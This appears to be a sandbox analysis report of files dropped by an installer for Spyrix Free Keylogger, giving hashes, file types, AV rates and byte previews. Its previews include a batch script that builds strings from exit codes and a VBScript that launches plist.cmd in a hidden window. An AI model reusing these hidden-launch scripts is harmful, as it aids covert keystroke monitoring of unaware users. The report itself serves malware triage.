                                                                                                                                                                                                                                                          SHA-256:2E92C42276AEA8D407AE41B3D8B63E6C39F33EC8D1CEEB4C632B54073B56BDA3
                                                                                                                                                                                                                                                          SHA-512:50B6035BA8C2B4F871CD2CEF057A4CF21433999E6EBC2566DD92843D4F3DFFEF00198FA80F3D34424FAF049BEAFAFA637DB1FD061251A7D10FC82735E0313A92
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................&...>J.............P....@..........................P........L...@... ......................0..G........C...........................p..(...........................L-.......................................................text...h...........................`..`.rodata.L..........................`.``.rotext..............t.............. .P`.data...|U...P...V...*..............@.p..rdata...k.......k.................@..@.bss........@2.......................`..edata..G....0........2.............@.0@.idata...C.......D....A.............@.0..CRT....4....P........B.............@.0..tls.........`........B.............@.0..reloc..(....p........B.............@.0B........................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6966
                                                                                                                                                                                                                                                          Entropy (8bit):5.257630429556265
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:qJsQ8ADU7ROZX0dzdVry5xFdakbSYiq3G4wcwcOIqS:cCA5ZX4zdc5xFdakbSYiqWCjd
                                                                                                                                                                                                                                                          MD5:B83D443D2415453D2BD5BA3D64233AF0
                                                                                                                                                                                                                                                          SHA1:71D6B4D21842B2E2214CA09A82BD0301BD02796F
                                                                                                                                                                                                                                                          SHA-256:99D10B82F2BD584C5B6554514B1A747EC4DD9D8131D3B397244B3D36084D3CA1
                                                                                                                                                                                                                                                          SHA-512:C7D2A341F45CF5F858EF28341574E26D5F6C4D2F7FCB32F6A490E5F4F1DF6B6E1A7D1B82329162C46F2734EB446298741A3B82F6D961AC82C376FDF767FA0F22
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:BM6.......6...(...0...0...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j..U..O.z>.z>..P..V..m................................................................................................................c.{4..B..P..b.e.v.v.f..b..Q..C.{5..d................................................................................................K..D..`.y.................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):402
                                                                                                                                                                                                                                                          Entropy (8bit):4.432468112054125
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:hmRBMeZSMo29ncrTMo29ncrZHbMo29ncrhMo29ncrXMo29ncrMMo29ncQXp23dUy:wbgK6fK6hbK6VK6bK6IK6CU9SL/A
                                                                                                                                                                                                                                                          MD5:498851BBE00277D04DB98A521FE760F7
                                                                                                                                                                                                                                                          SHA1:671A1E5F003A81734DCF193321F60AC0C7AB1739
                                                                                                                                                                                                                                                          SHA-256:1F5C9CB793AAC6CB8B677222C0689A955CE2A52B4022E6179AB70EB8A4261513
                                                                                                                                                                                                                                                          SHA-512:98C1DC048EDDFCB72EDA4DE75C8237FF19A4B8AFA9D31572ED608BF8018713AE4073F82F0CF838B09CE4F51746A3B17DC88619ACC7C2C6FF7453FE885059AE50
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:@echo off..set u_id=..cmd /c exit 83..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 112..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 121..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 114..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 105..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 120..set u_id=%u_id%%=exitcodeAscii%..set prg_id=%u_id% Free Keylogger..set d_id=dashboard..set p_id=https..set e_id=xe
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3588216
                                                                                                                                                                                                                                                          Entropy (8bit):6.632180080317583
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:Q61JrfvgRnMoHNNbwH3MhrHAGeEyU/4BiCklNl5tj0Qh+Pw/YlAKGC9eX2nuZHz7:/rfvgRMoHNNbwH3eTeEyU/4BiCklNl5D
                                                                                                                                                                                                                                                          MD5:D9EA512EE580ECFFEE587A4C3759527F
                                                                                                                                                                                                                                                          SHA1:B91480398B8820436B6634421D5AF628E482B890
                                                                                                                                                                                                                                                          SHA-256:4C493F7DC51A50BBE139993CDB1267DD1F7A33020DF9075ECD7D28FDCE9EC63F
                                                                                                                                                                                                                                                          SHA-512:BA212D929E7EE9478FF141F36950673EABCB31F71C39818D3F6A0A6F7AB57E2676445D815BAF6BC5F97477B4C8D6CBCC07F8051B87CFE800924064B5989CE7C4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z\..................(...6..:............(...@..........................07.....|.7...@... ......................P5.1....`5.......5.X.............6.x.....5..|............................4.....................0e5.|............................text.....(.......(.................`..`.data....=....(..>....(.............@.`..rdata....... ).......).............@.`@.bss.....9....5.......................`..edata..1....P5.......5.............@.0@.idata.......`5.. ....5.............@.0..CRT....4.....5......(5.............@.0..tls..........5......*5.............@.0..rsrc...X.....5......,5.............@.0..reloc...|....5..~...45.............@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):76673
                                                                                                                                                                                                                                                          Entropy (8bit):7.9848305082884155
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:MAid3jb4CBlw8s1Q/03i/NRj/CWM9oLMqFAT5/EUx:MpoC/l703mx29ZwA9H
                                                                                                                                                                                                                                                          MD5:3A12AA38DC04011E4267D84F9DF29A16
                                                                                                                                                                                                                                                          SHA1:DB2B83756D27969D5701F20925A023B282B2212F
                                                                                                                                                                                                                                                          SHA-256:16F1E3749736EC4BC63E0E64474FEDFED96468EE5901D1E3DADD3490C2B72380
                                                                                                                                                                                                                                                          SHA-512:51A27A92771E6D2475A0B13965064A2C0BD4F9074E4CB344CBFFE046189F5B3A130321C7651C25F37BF66CF312D8A953B77FC4CE99F47C55A2FB63603D8CC47B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............."......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..........o.d...yIDATx^..t........$.L..43w.....,[.$..B.d.-...................]V.J.......Y_...y..?..O.~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~........<.j.q.......tq..K.Zu.V..>..}..}..........7.&~.b....5.js....x...T\.s.`-.w.............M.'........o.......4.#...._Z....GuSF7....]>.'.............n....;.../..>|XN.<i.../...kr..u.u..sg.~...?.O?....B..)c....L...7o........+r....y..wO...._n.m.@.>..u......J?...|.f....)...................t.....k......`.M.........o.....O......X.2.S......|..G.....ic._.p.G..S^_s..}c..k..5...@..h..U.Z..-_S....|..R.Ycy.+..2...}..cm..@................;..6;^M.....Yc.).......1.....$T..<...I...>W....k......(..-...p...'....S...\.........F7o..6~]...,(~........f.v.zat#.&....|}.....O.4...K..,T.#.(9.........x.@.7...Mo......(-...c#...O.....EM.a..OB..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.4065994592116873
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:4nISm6zYtefo8+9n8Qm8NUF8hxR8Y8Y82KIl:uzmIeefw9PmKx7l
                                                                                                                                                                                                                                                          MD5:8CD9FC7BAA20456A91F3AC4DCEB36D1C
                                                                                                                                                                                                                                                          SHA1:B40529BB8752FACB6C2BA3421FDE5670A45D58E3
                                                                                                                                                                                                                                                          SHA-256:B9E55A391E3C165DE3B3D08C49C7695B350623E37DD71A5A051D90A027939710
                                                                                                                                                                                                                                                          SHA-512:B271657DE4EB639C92877C3C83C0F67254A32D0BCEB48999EABDD9095D5B1804B946E4FDEA217E7BE0F7D1877AA0F9CA7AFEE69576AC9962AFBCFAECDFD1B14F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..................................................................................................................j...d...d...j..............................................d...p...........p...d...~...............................s...d.........................c...q..........................d.................................d......................q...t...................................y...l...................d...................d...~...................d...................d...v...u...d...d...........................d...................d...d...i..................................d...................d...................................d...d...d...................d.......................k...d...p..........d...................d..........................................d...................d...........................................d...................d...........................................d.......................n...........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1308909
                                                                                                                                                                                                                                                          Entropy (8bit):6.226978823759581
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:8tdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt54DTx9KJ:kqTytRFk6ek14hk
                                                                                                                                                                                                                                                          MD5:E7AB51FCD6A4B56B17A6D7019743346A
                                                                                                                                                                                                                                                          SHA1:0AC79F07195B6D6C25D64864C762E5910D8DC52F
                                                                                                                                                                                                                                                          SHA-256:3BA57A14C77AD692AD21D6502ED32A9FFD1E23CF908F70A4E3E13635DEBED246
                                                                                                                                                                                                                                                          SHA-512:1F2CAA370B45ACCEF65E1863EEC48D02395349D44FDED44E9FE3652F5CDA05A3DC271295550EC9905826F964D20E9774793DACA0937F5D79308154E060AFD808
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@..........................p............@......@..............................@8...0...2................................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc....2...0...4...l..............@..@....................................@..@........................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):88
                                                                                                                                                                                                                                                          Entropy (8bit):4.920531868608183
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HRAbABGQYmjziJS40dyTKWV7GGWyXKokJr:HRYFVmjzic40dyTKWV7WyuV
                                                                                                                                                                                                                                                          MD5:5691CB02970E3D46042CD411DDD33C42
                                                                                                                                                                                                                                                          SHA1:5F98A89B9505821B32D1A9B9362A9A8881DF2790
                                                                                                                                                                                                                                                          SHA-256:9C16F6639225765BAA8F23C7B37724B0B3E4837B41F90F612C81AEEDDE79CF68
                                                                                                                                                                                                                                                          SHA-512:A36A6B642A23CA333055602214253D4616FB94CEFC3A89614AE8FD314D93E7887B4FDFD394C9D60BA1474A5AE4EF45EE5639E0F84197FBD4D25CE896FDEB29A6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[InternetShortcut]..URL="http://www.spyrix.com/spyrix-products.php?from=sfk_install"....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5041576
                                                                                                                                                                                                                                                          Entropy (8bit):7.897794442025251
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:qsV54zBHy/xGu5//Sjl9WBOo/lKCJPNKr0NPq5Csnm7vkj:Rj49SMuJ/pv9p1gEn2
                                                                                                                                                                                                                                                          MD5:5788EF0F651292941577684F0499B114
                                                                                                                                                                                                                                                          SHA1:81B688AE137BB2F79C44B8A22737CB1416D2C00B
                                                                                                                                                                                                                                                          SHA-256:625BC8352D48D8F0764CAD81AEE94217D4B139DFD00E51DCAA5128F36CD20952
                                                                                                                                                                                                                                                          SHA-512:7A71FD55F60A0B5CE82FF61381E73B38E16B495784739B0580D391FCD652A4C147FF8E558939B1AF4D085F749B6EE42C142D52037CA1BF0B61C64A49C3D2A7C3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....<.f..................,..X................,...@...................................M..........@..........................|...p.....5...............L..!............E.......................................................................................,......*..................@............@....,.....................@............0....,......H..............@............p... ......................@............P....0..<..................@.................0.....................@.................0.....................@.................1.....................@.................1.....................@....rsrc.........5.....................@................E...&... .............@....d....................G.............@....adata..........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):330752
                                                                                                                                                                                                                                                          Entropy (8bit):6.515569416355077
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:67uz8VUGgQvLpVZ0hRBbV94fT5fyEH1iiDDR/WzdHAjdqqI4PFtK9S7/Q0RHK9mo:uuwUGggLpVZ0NbV9CNfyEHAiDDR/Wzdt
                                                                                                                                                                                                                                                          MD5:CB66A1FEC9236CD46E2A3E5A00D887A5
                                                                                                                                                                                                                                                          SHA1:531113059786F73A8C2376E08A12E62970B41E51
                                                                                                                                                                                                                                                          SHA-256:73234A2B168E2CA92B2E09346C48FB85CF10085FAF76D7923257986B3F528E1C
                                                                                                                                                                                                                                                          SHA-512:F5E3AD6B8FD6DCE55C0596BAF6961F86CD98598075899C02FB0B5C32FAF26FEA80C7C348C08D5D5FE41D89D61D869CF27AB230962A896D085206A895881CD926
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hN.. ... ... ...[... ..q.... ..q.... ..q.... ...!.>. ..q..>. ..q.... ..q.... ..q.... .Rich.. .........................PE..L...L*.O...........!.........b......+........................................`.........................................p$...y..<.......8.................... ..D+...................................u..@...............P............................text...P........................... ..`.rdata..@...........................@..@.data...D\.......@..................@....rsrc...8...........................@..@.reloc...1... ...2..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2012072
                                                                                                                                                                                                                                                          Entropy (8bit):6.507543848379717
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:I/+4IbyaBqP3uDjd5DGX0BcSRDEpMFWJQi2GstDTwT7ijxHviMgaMVp/bdK6dF3r:cKJ+SCpnZsgNdK48h9njDQBB
                                                                                                                                                                                                                                                          MD5:C0E67E8723775249CA0AE2C52E7EDD9E
                                                                                                                                                                                                                                                          SHA1:3C460DBE351520494B0DCD8CAF5E1B0A53ACD2E4
                                                                                                                                                                                                                                                          SHA-256:D73E36AC1840D1D34DDF62DF55A8CFD64C17FCA9C92C3159D891964C2A7D0C3F
                                                                                                                                                                                                                                                          SHA-512:1A5AFA83529DB0B4F573D1BBC38BDA6958BE6991343E76A267516043250CE960E859560EE9433DFB93EF42CDBF97DED87CB3871057C8C746C4A75E2AAF548FD4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......b..........................................@..........................@......$%...........@...............................;......l................!...`..|&...........................P...............................0..&....................text............................... ..`.itext........... .................. ..`.data....{.......|..................@....bss.....W...........|...................idata...;.......<...|..............@....didata.&....0......................@....tls....<....@...........................rdata.......P......................@..@.reloc..|&...`...(..................@..B.rsrc...l...........................@..@.............P......................@..@........................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):225
                                                                                                                                                                                                                                                          Entropy (8bit):4.8759757685468275
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:j+q9NqhVIZ3WGpDSRR26RuBFCOoVgfBbtLFu:Kqahm5WGDS3vuvCO0Yq
                                                                                                                                                                                                                                                          MD5:BDFC59070BFBBB84ED2FB09198896A81
                                                                                                                                                                                                                                                          SHA1:D8C6E3A0E847199D16DC237C7BEC47A4148EB3D6
                                                                                                                                                                                                                                                          SHA-256:033C50986AD34B15E737466398CF5E06116E560251040899871D97EC33E03B47
                                                                                                                                                                                                                                                          SHA-512:DAEAEEDB6744464E6B524EACE531B902A066BA2E643F7626142D9444F070261EC9B0D6C4EA4A4C9874646A951D62B2D218B0ACC48E0FAFCF5CB9DEA0CF661E96
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Set objShell = CreateObject("WScript.Shell")..Dim FilePath..FilePath = WScript.ScriptFullName..FilePath = Left(FilePath, Len(FilePath) - 10)..objShell.CurrentDirectory = FilePath..objShell.Run "cmd.exe /c plist.cmd", 0, False
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3588216
                                                                                                                                                                                                                                                          Entropy (8bit):6.632180080317583
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:Q61JrfvgRnMoHNNbwH3MhrHAGeEyU/4BiCklNl5tj0Qh+Pw/YlAKGC9eX2nuZHz7:/rfvgRMoHNNbwH3eTeEyU/4BiCklNl5D
                                                                                                                                                                                                                                                          MD5:D9EA512EE580ECFFEE587A4C3759527F
                                                                                                                                                                                                                                                          SHA1:B91480398B8820436B6634421D5AF628E482B890
                                                                                                                                                                                                                                                          SHA-256:4C493F7DC51A50BBE139993CDB1267DD1F7A33020DF9075ECD7D28FDCE9EC63F
                                                                                                                                                                                                                                                          SHA-512:BA212D929E7EE9478FF141F36950673EABCB31F71C39818D3F6A0A6F7AB57E2676445D815BAF6BC5F97477B4C8D6CBCC07F8051B87CFE800924064B5989CE7C4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z\..................(...6..:............(...@..........................07.....|.7...@... ......................P5.1....`5.......5.X.............6.x.....5..|............................4.....................0e5.|............................text.....(.......(.................`..`.data....=....(..>....(.............@.`..rdata....... ).......).............@.`@.bss.....9....5.......................`..edata..1....P5.......5.............@.0@.idata.......`5.. ....5.............@.0..CRT....4.....5......(5.............@.0..tls..........5......*5.............@.0..rsrc...X.....5......,5.............@.0..reloc...|....5..~...45.............@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54
                                                                                                                                                                                                                                                          Entropy (8bit):4.722027548259444
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HRAbABGQYmjzPK/tWwMdyTHn:HRYFVmjzPAt0dyTH
                                                                                                                                                                                                                                                          MD5:D1CA0FE113AE79394ECFA5225B06D03A
                                                                                                                                                                                                                                                          SHA1:2EFEB00BC64706B390FA188776A423DD871AE842
                                                                                                                                                                                                                                                          SHA-256:A9A52C2A16DAB18ED9E869CAE2F486327040572461E05FB8F774DC543A82CD45
                                                                                                                                                                                                                                                          SHA-512:BFDE031A1C39770EEAF27F0874B01C99BCA6D3EAB2D55B9FABFD28CAD2EF6D56387510548DFCA3F575D7341B16B05961C00083E19AB33A07A84343B257CB385A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[InternetShortcut]..URL="https://dashboard.spyrix.com"
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):826775
                                                                                                                                                                                                                                                          Entropy (8bit):6.520580307753605
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:QJCoOO8Mh2X8Vy0JHfv3kDpigeLKh2R6fFQVp:QL8MFVym/kDpitLKZy
                                                                                                                                                                                                                                                          MD5:16A1612789DC9063EBEA1CB55433B45B
                                                                                                                                                                                                                                                          SHA1:438FDE2939BBB9B5B437F64F21C316C17CE4A7F6
                                                                                                                                                                                                                                                          SHA-256:6DEAEC2F96C8A1C20698A93DDD468D5447B55AC426DC381EEF5D91B19953BB7B
                                                                                                                                                                                                                                                          SHA-512:D727CE8CD793C09A8688ACCB7A2EB5D8F84CC198B8E9D51C21E2DFB11D850F3AC64A58D07FF7FE9D1A2FDB613567E4790866C08A423176216FF310BF24A5A7E3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...TM<W....*......!.....j.........................a.........................`.......#........ .........................................x.......................@/..................................................................................text...,i.......j..................`.P`.data................p..............@.`..rdata..............................@.`@.bss..................................`..edata...............f..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...x...........................@.0..reloc..@/.......0..................@.0B/4........... ......................@.@B/19.........0......................@..B/31..................j..............@..B/45.................................@..B/57.................................@.0B/70.....i.... ..........
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5346216
                                                                                                                                                                                                                                                          Entropy (8bit):7.988360707624317
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:9Aukt/stZJew8Q4dDEzRGWhn2C+RQJ0AbFGPIdPcMAWF2X+3ftgKOJT8:yLRTV5dD4RHd2d6bMQpAOQJI
                                                                                                                                                                                                                                                          MD5:11ADE4625528B6E7E1601681867E094E
                                                                                                                                                                                                                                                          SHA1:8B15562DD9E126772489D6AA0471DC0AA6C7D584
                                                                                                                                                                                                                                                          SHA-256:83D34416005C617CB29111CBB4AFC963DFB293C67BB78481734ED927BCA5B67F
                                                                                                                                                                                                                                                          SHA-512:20E4D7EC8C33433EEA1A879008DCA19F235E051FE5F7E58DD950E13993355205CC8792C08EC7C506ADF0B284E845A01C5BBC36DBDD5899294F3EEB0D38CEAD52
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...}..f.................rF...................F...@...........................,.......R..........@..........................|l&......@N.8............rQ..!...........`h......................l&..............................................................@F.........................@............@...PF......2..............@............@....F......J..............@.................G.....................@............P....H..H..................@.................H......"..............@.................H......$..............@.................H......$..............@............@....I..h...&..............@....rsrc.... ...@N.....................@................`h...+..B..............@....data....`...`&..`....K.............@....adata........,.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                          Entropy (8bit):4.849870364976637
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HRAbABGQYmjzcSL0dyTKVQXGNErnVIXKobn:HRYFVmjzjL0dyTK6XaErVI9
                                                                                                                                                                                                                                                          MD5:7B7C177B6FA25296550B3643448FCA00
                                                                                                                                                                                                                                                          SHA1:FA9744B1844CA32600EE661081CA6BBFD1B317D4
                                                                                                                                                                                                                                                          SHA-256:F7B25ED414E8005EDDBBEA787FA3594C798FC7F683E77835DAA33635A395CE51
                                                                                                                                                                                                                                                          SHA-512:5F61FF8894C530B21F7E4646798ECFA65D88FF55AF807280AA16233818E0F0043EBE6BF764C48BEA4C160EDAA3800BD9894C1BD2D01370F7200CD5E718C7B74A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[InternetShortcut]..URL="https://www.spyrix.com/purchase.php?from=sfk_uninstall"
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                          Entropy (8bit):4.084962500721156
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:sLvovFN/tQZn:EItK
                                                                                                                                                                                                                                                          MD5:70C758B45D366FDD5BA4F0D0D1088B94
                                                                                                                                                                                                                                                          SHA1:CD0CBB3DF6F011B41B24F8E1CA805469F234F044
                                                                                                                                                                                                                                                          SHA-256:DCF52739862C4FBF4B4C04F470F9F62B46E308E9E5FA87CDFAD1DC66E753DF16
